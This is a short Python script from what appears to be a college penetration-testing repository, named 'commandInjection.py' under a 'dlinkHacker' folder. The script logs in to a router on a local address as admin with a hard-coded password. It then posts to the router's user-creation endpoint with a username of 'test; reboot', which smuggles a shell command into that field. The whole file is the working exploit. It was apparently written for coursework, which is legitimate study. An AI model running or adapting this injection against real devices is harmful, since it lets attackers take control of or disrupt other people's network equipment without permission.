Files
college-pentesting/dlinkHacker/commandInjection.py
2018-11-24 05:56:26 +01:00

6 lines
260 B
Python

from connections import *
print(postReq("http://192.168.1.219/setSystemAddUser", "admin", "Azerty123", {"ReplySuccessPage":"advanced.htm", "ReplyErrorPage":"errradv.htm","SessionKey":"1543011420", "UserName": "test; reboot", "Password":"aaaaaaaaaaaaaaa"}))